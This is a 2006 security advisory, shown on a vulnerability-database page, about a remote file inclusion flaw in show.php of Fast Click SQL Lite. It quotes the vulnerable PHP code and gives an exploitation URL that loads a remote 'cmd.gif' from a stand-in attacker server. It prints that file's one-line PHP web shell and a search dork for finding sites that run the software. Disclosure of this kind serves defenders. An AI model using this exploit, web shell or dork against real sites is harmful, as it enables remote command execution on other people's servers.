Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAminRaydenPACKETSTORM:46084
HistoryMay 06, 2006 - 12:00 a.m.

fastclicklite113.txt

2006-05-0600:00:00
AminRayden
packetstormsecurity.com
13
JSON
`Fast Click SQL Lite <= 1.1.3 Remote File Inclusion  
-------------------------------------------------------  
Aria-security.com advisory  
Bug Discovered by R@1D3N (amin emami)  
email:[email protected] and [email protected]  
Date:02/05/2006  
original advisory:http://www.aria-security.net/advisory/fc/fastclicksqllite.txt  
--------------------------------------------------------  
Affected software description:  
Fast Click SQL Lite <= 1.1.3  
Vendor:http://www.ftrain.siteburg.com/fclicksqlpro/fclick.php?fclicksql  
Vulnerability: remote file inclusion  
Dork:inurl:"fclick.php?id"  
---------------------------------------------------------  
Disscution:  
The bug reside in show.php  
  
Vulnerable Code:  
$CFG['SDIR'] = $path;  
$CFG['CDIR'] = $CFG['SDIR']."./common";  
require_once($CFG['CDIR']."/error.php");  
require_once($CFG['CDIR']."/init.php");  
  
Exploitation example:  
http://[target].com/[path]/show.php?path=http://evilserver/cmd.gif?&cmd=uname -a  
  
---------------------------------------------------------  
cmd.gif  
-----------  
<?  
system($cmd);  
?>  
-----------  
  
* Fix *:  
  
Contact the Vendor  
  
  
===========================================================  
Aria Security Research  
Http://www.aria-security.net  
`
JSON